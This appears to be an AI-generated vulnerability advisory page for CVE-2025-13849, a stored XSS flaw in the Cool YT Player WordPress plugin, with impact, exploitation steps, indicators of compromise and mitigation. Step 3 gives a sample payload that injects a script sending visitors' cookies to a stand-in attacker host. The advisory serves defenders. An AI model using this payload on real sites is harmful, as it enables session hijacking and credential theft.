CVE-2025-13849: 
WordPress vulnerability analysis and mitigation

Overview

CVE-2025-13849 is a Stored Cross-Site Scripting (XSS) vulnerability in the Cool YT Player plugin for WordPress, affecting all versions up to and including 1.0. The flaw exists in the videoid parameter due to insufficient input sanitization and output escaping, allowing authenticated attackers with Contributor-level access or above to inject arbitrary web scripts into pages. It was published on January 7, 2026, and assigned by Wordfence. The vulnerability carries a CVSS v3.1 base score of 6.4 (Medium) (Wordfence).

Technical details

The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation), specifically a stored XSS variant. The vulnerable code is located in includes/youtube_video_wrapper.php at line 58, where the videoid parameter is rendered into the page output without proper sanitization or escaping (WordPress Plugin Trac). An attacker with at least Contributor-level WordPress access can embed a malicious shortcode or block using a crafted videoid value containing JavaScript, which is then stored in the database and executed in the browser of any user who views the affected page. No user interaction beyond page viewing is required for the payload to execute.

Impact

Successful exploitation allows injected scripts to execute in the context of any user's browser session when they visit an affected page, including administrators. This can lead to session cookie theft, credential harvesting, defacement of site content, redirection to malicious sites, or further attacks against site visitors. The scope is changed (S:C), meaning the impact extends beyond the plugin itself to the broader WordPress site and its users, though availability is not directly affected (Wordfence).

Exploitability

No public proof-of-concept exploit code or in-the-wild exploitation has been reported for this vulnerability. The EPSS score is approximately 0.029% (0.000290), indicating a very low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires authenticated access at the Contributor level or above, which limits the attack surface compared to unauthenticated vulnerabilities (Wordfence).

Exploitation steps

  1. Gain Contributor Access: Obtain or register a WordPress account with at least Contributor-level privileges on a target site running Cool YT Player version 1.0 or earlier.
  2. Create or Edit a Post: Navigate to the WordPress editor and create a new post or edit an existing one where the Cool YT Player shortcode or block can be inserted.
  3. Inject Malicious Payload: Set the videoid parameter to a crafted value containing a JavaScript payload, e.g., "><script>document.location='https://attacker.com/steal?c='+document.cookie</script>, exploiting the lack of sanitization in youtube_video_wrapper.php line 58.
  4. Publish the Post: Submit or publish the post, causing the malicious payload to be stored in the WordPress database.
  5. Trigger Execution: When any user (including administrators) visits the page containing the injected content, the script executes in their browser, enabling session hijacking, credential theft, or further attacks (WordPress Plugin Trac, Wordfence).

Indicators of compromise

  • Logs: WordPress access logs showing POST requests to wp-admin/post.php or REST API endpoints with unusual videoid parameter values containing HTML tags or JavaScript.
  • Database: WordPress wp_posts or wp_postmeta tables containing entries with <script>, javascript:, or encoded XSS payloads within videoid field values.
  • Network: Outbound requests from user browsers to unexpected external domains shortly after visiting pages containing the Cool YT Player shortcode, potentially indicating cookie or credential exfiltration.
  • File System: No direct file system artifacts expected, as the payload is stored in the database rather than the file system.

Mitigation and workarounds

Users should update the Cool YT Player plugin to a version above 1.0 that includes proper input sanitization and output escaping for the videoid parameter. If no patched version is available or the plugin is no longer maintained, the recommended action is to deactivate and remove the plugin entirely. As a temporary measure, site administrators can restrict Contributor-level user permissions or audit existing posts for suspicious videoid values. Web application firewalls (WAFs) with XSS filtering rules can provide an additional layer of defense (Wordfence).

Community reactions

Wordfence disclosed and assigned this CVE as part of their ongoing WordPress plugin vulnerability research, and it was included in their weekly WordPress vulnerability report for January 5–11, 2026. No significant broader media coverage or notable researcher commentary beyond the Wordfence disclosure has been identified for this vulnerability (Wordfence Blog).

Additional resources


Source: This report was generated using AI

Related WordPress vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-86850MEDIUM6.5
  • sku-error-fixer-for-woocommerce
NoNoOct 06, 2026
CVE-2026-88931MEDIUM5.3
  • social-web-suite
NoNoOct 06, 2026
CVE-2026-87841MEDIUM5.3
  • unitechpay-paiements-mobile-money
NoNoOct 06, 2026
CVE-2026-92990MEDIUM5.3
  • sendpress
NoNoOct 06, 2026
CVE-2026-92989MEDIUM4.3
  • sendpress
NoNoOct 06, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management